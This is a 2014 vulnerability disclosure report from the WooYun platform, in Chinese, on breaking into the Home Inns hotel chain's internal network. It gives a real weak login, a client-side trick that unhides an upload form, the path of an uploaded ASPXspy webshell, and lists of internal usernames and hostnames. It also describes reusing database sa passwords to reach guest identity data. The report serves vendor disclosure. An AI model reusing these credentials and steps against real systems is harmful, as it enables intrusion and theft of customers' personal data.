看我如何进入如家内网(今天,你开房了吗?)

漏洞详情

披露状态:

2014-02-21: 细节已通知厂商并且等待厂商处理中
2014-02-21: 厂商已经确认,细节仅向厂商公开
2014-03-03: 细节向核心白帽子及相关领域专家公开
2014-03-13: 细节向普通白帽子公开
2014-03-23: 细节向实习白帽子公开
2014-04-07: 细节向公众公开

简要描述:

一直觉得“看我如何……”这种标题有点太屌了,今天自己特别找一个来试试体验下感觉。
目前已经看了20多台数据库服务器,今天你开房了吗?开了?绝对可以查到。各种用户信息啊……似乎还有地方可以改房价?……总之数据库各种东西吧

详细说明:

主要原因还是http://office.homeinns.com/hcs/引起的。各种不用ikey就可以登录的弱口令,各种不防暴力破解连个验证码都没有……

先说hcs这个系统。

弱口令zuods/zuods123直接进去(这是一个老总吗?)

image006.png



各种销售人员?

image008.png



打开http://office.homeinns.com/hcs/Configure/Filesmanage.aspx

image010.png





原本我们是没有看见文件上传的,行:

先看源码:

function UpTo() 
{
//弹出窗口
$('#Upinfo').dialog({autoOpen: false, modal:true, resizable:false, draggable: true, title: '文件上传', dialogClass: "login_dialog" });
$('#ctl00_ContentPlaceHolder1_btnUpload').click( function(){$("#Upinfo").load('../Configure/UpFileLoad1.html').dialog('option', { 'width': 600, 'height': 250, 'title': '文件上传' }).dialog('open');return false; });

}



哦哦有文件上传的对话框哦?咋搞出来呢?

找一个合适的位置添加如下代码:

<input type="button" id="ctl00_ContentPlaceHolder1_btnUpload" value="Click" onclick="UpTo()" />

image012.png



点击之后上传就出来咯:

image013.png



上一个!

image015.png



在下载处直接有路径

http://office.homeinns.com/Hcs/uploadfiles/ASPXspy2.aspx

最近园长有改过这货……2014版,欢迎关注!

image017.png



各种“内部文件”???

image019.png



image021.png



内网IP。

多个mssql的sa密码泄漏

image022.png



image024.png

漏洞证明:

看内网吧。以下内容适当屏蔽了一些信息



域用户:
\\021rjsh0070s.home.cn 的用户帐户

-------------------------------------------------------------------------------
2050 2051 2052
2053 2054 2055
2056 2057 2058
2059 2060 2061
2062 2063 2064
2065 2066 2067
2068 2069 2070
2071 2072 2073
2074 2075 2076
2077 2078 2079
2080 2081 2082
2083 2084 2085
2086 2087 2088
2089 2090 2091
2092 3001 3002
3003 3004 3006
3007 3008 3009
3010 3011 3012
3013 3014 3015
3016 3017 3018
4001 4002 4003
4005 4006 4007
4008 4009 4010
4011 4012 4013
7001 7002 7003
7004 7005 8001
8002 8003 8004
8008 8009 8010
8011 alzhao Appadmin
aqsun aschen autocad
aychen bbding bbsun
………………………………
………………
ztzhong zxchen zxie
zxqiu zxwang zychai
zydeng zydong zyhu
zywei zyxie zyyin
zyzhang zzzuo 茅燕华
命令成功完成。

Server Name Remark
-------------------------------------------------------------------------------
\\021KAIFATEST
\\021RISH-148WRK
\\021RJ17443W
\\021RJSH-015WRK
\\021RJSH-108WRK
\\021RJSH-109WRK
\\021RJSH-110WRK
\\021RJSH-111WRK
\\021RJSH-112WRK
\\021RJSH-113WRK
\\021RJSH-114WRK
\\021RJSH-118WRK
\\021RJSH-119WRK
\\021RJSH-121WRK
\\021RJSH-125WRK
\\021RJSH-126WRK
\\021RJSH-129WRK
\\021RJSH-130WRK
\\021RJSH-132WRK
\\021RJSH-133WRK
…………
…………
\\021RJSH-135WRK
\\021RJSH-136WRK
\\021RJSH-137WRK
\\021RJSH-142WRK
\\021RJSH-144WRK
\\021RJSH-145WRK
\\021RJSH-147WRK
\\021RJSH-153WRK
\\021RJSH-154WRK
\\021RJSH-155WRK
\\021RJSH-156WRK
\\021RJSH-160WRK
\\021RJSH-162WRK
\\021RJSH-163WRK
\\021RJSH-166WRK
\\021RJSH-167WRK
\\021RJSH-168WRK
\\021RJSH-170WRK
\\021RJSH-172WRK
\\021RJSH-174WRK
\\021RJSH-177WRK
\\021RJSH-179WRK
\\021RJSH-182WRK
\\021RJSH-189WRK
\\021RJSH-191WRK
\\021RJSH-195WRK
\\021RJSH-197WRK
\\021RJSH-200WRK
\\021RJSH-202WRK
\\021RJSH-203WRK
\\021RJSH-204WRK
\\021RJSH-207WRK
\\021RJSH-208WRK
\\021RJSH-209W
\\021RJSH-209WRK
\\021RJSH-210WRK
\\021RJSH-213WRK
\\021RJSH-215WRK
\\021RJSH-216WRK
\\021RJSH-217WRK
\\021RJSH-221WRK
\\021RJSH-228WRK
\\021RJSH-229WRK
\\021RJSH-230WRK
\\021RJSH-231WRK
\\021RJSH-246WRK
\\021RJSH-56W
\\021RJSH-62WRK
\\021RJSH-72WRK
\\021RJSH-82WRK
\\021RJSH-91WRK
\\021RJSH00007S
\\021RJSH00014S
\\021RJSH00103S2
\\021RJSH00114S
\\021RJSH00135S
\\021RJSH00138S-2
\\021RJSH00139S
\\021RJSH00141S
\\021RJSH00146S
\\021RJSH00153S
\\021RJSH00154S
\\021RJSH00156S2
\\021RJSH00166S
\\021RJSH00166S2
\\021RJSH00167S
\\021RJSH00170S
\\021RJSH00176S
\\021RJSH00193S
\\021RJSH00196S2 021rjsh
\\021RJSH00197S2
\\021RJSH00198S
\\021RJSH00199S
\\021RJSH00200S
\\021RJSH00215S
\\021RJSH00216S
\\021RJSH00217S
\\021RJSH00218S
\\021RJSH00219S
\\021RJSH00221S
\\021RJSH00226S
\\021RJSH00230S
\\021RJSH00233S
\\021RJSH00242S
\\021RJSH00249S
\\021RJSH00250S
\\021RJSH00251S
\\021RJSH0026S
\\021RJSH0027S
\\021RJSH0029S2
\\021RJSH0030S2
\\021RJSH0031S
\\021RJSH0035S
\\021RJSH0037S
\\021RJSH0038S
\\021RJSH0039S
\\021RJSH0041S
\\021RJSH0045S
\\021RJSH0046S-1
\\021RJSH0047S
\\021RJSH0048S
\\021RJSH0049S
\\021RJSH0050S-1
\\021RJSH0051S
\\021RJSH0052S
\\021RJSH0054S2
\\021RJSH0055S
\\021RJSH0056S
\\021RJSH0058S
\\021RJSH0059S
\\021RJSH0061S
\\021RJSH0062S
\\021RJSH0063S
\\021RJSH0064S
\\021RJSH0068S2
\\021RJSH0070S
\\021RJSH0071S
\\021RJSH0072S-1
\\021RJSH0073S
\\021RJSH0074S
\\021RJSH0076S
\\021RJSH0077S
\\021RJSH0078S
\\021RJSH0081S
\\021RJSH0082S WSUS & NAV Update Server
\\021RJSH0083S
\\021RJSH0084S
\\021RJSH0085S2
\\021RJSH0086S
\\021RJSH0088S
\\021RJSH0089S
\\021RJSH0090S
\\021RJSH0091S
\\021RJSH0093S
……………………………………
………………………………
\\RUJIA-REC5
\\RYZHANG-PC
\\TESTSERVER
\\U5C9502
\\WWW-07A33BE82F1
\\XUNIJI001
\\XUNIJI002





先看192.168.210.*段:

image026.png



image027.png



image028.png





匿名ftp

image029.png



还有各种SA相同口令,超过15个,可以任意脱裤!包含非常多的用户数据,如用户真实姓名、身份证和密码。

image030.png



image031.png





看看数据库服务器里面的数据内容

192.168.210.35,用户数据,太敏感,就不截图太多了免得泄漏信息。下面的也是点到为止避免扩大危害

image032.png



image034.png



image035.png





192.168.210.38:我是不是可以改房价?

image037.png



192.168.210.72

image039.png



192.168.210.65

image040.png



192.168.210.72

image041.png



192.168.210.251

image043.png





172.23.100.*段:

image045.png



多个SA口令:

image046.png



172.23.100.21:

image047.png



image049.png





172.23.100.109

image051.png



image053.png



System直接可以搞:

image055.png



具体就不再操作了。其它ip其实还有类似的问题,我就不再弄了。

修复方案:

多种类型……综合分析看看怎么修复吧

另外乌云@疯狗 @xsser 可以给个雷吗?好久没被雷了

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-21 11:52

厂商回复:

感谢关注!!!

最新状态:

暂无


漏洞评价: